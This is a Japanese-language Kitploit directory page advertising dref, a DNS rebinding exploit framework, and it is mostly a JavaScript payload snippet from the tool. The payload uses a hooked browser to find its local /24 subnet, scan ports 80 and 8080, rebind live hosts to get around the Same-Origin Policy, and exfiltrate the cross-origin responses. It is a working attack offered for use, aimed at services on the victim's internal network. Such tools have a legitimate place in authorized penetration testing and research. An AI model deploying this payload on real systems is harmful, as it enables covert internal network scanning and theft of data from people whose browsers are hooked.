Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
dref — DNSリバインディングエクスプロイトフレームワーク | Kitploit
ツール/GitHubGitHub/reverseclabs/dref
IoTセキュリティエクスプロイトウェブセキュリティペネトレーションテストレッドチーミングDNS分析
GitHubreverseclabs/dref

dref

DNSリバインディングエクスプロイトフレームワーク

リポジトリを見る
494715年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

DNSリバインディングエクスプロイトフレームワーク

このプロジェクトはメンテナンスされていません。

drefはDNSリバインディングの重労働を行います。以下は、組み込みペイロードの一つからのスニペットで、フックされたブラウザからローカルサブネットをスキャンするためにフレームワークが使用される様子を示しています。ライブWebサービスを特定した後、Same-Originポリシーを簡単に突破してGETレスポンスを流出させます。

root@kitploit:~
// mainFrame() runs first
async function mainFrame () {
  // We use some tricks to derive the browser's local /24 subnet
  const localSubnet = await network.getLocalSubnet(24)

  // We use some more tricks to scan a couple of ports across the subnet
  netmap.tcpScan(localSubnet, [80, 8080]).then(results => {
    // We launch the rebind attack on live targets
    for (let h of results.hosts) {
      for (let p of h.ports) {
        if (p.open) session.createRebindFrame(h.host, p.port)
      }
    }
  })
}

// rebindFrame() will have target ip:port as origin
function rebindFrame () {
  // After this we'll have bypassed the Same-Origin policy
  session.triggerRebind().then(() => {
    // We can now read the response across origin...
    network.get(session.baseURL, {
      successCb: (code, headers, body) => {
        // ... and exfiltrate it
        session.log({code: code, headers: headers, body: body})
      }
    })
  })
}










開始するにはWikiをご覧になるか、ヘッドレスブラウザを攻撃するdrefを実用的なユースケースとしてチェックしてください。

これは開発リリースです - 本番環境では使用しないでください

ツールをダウンロード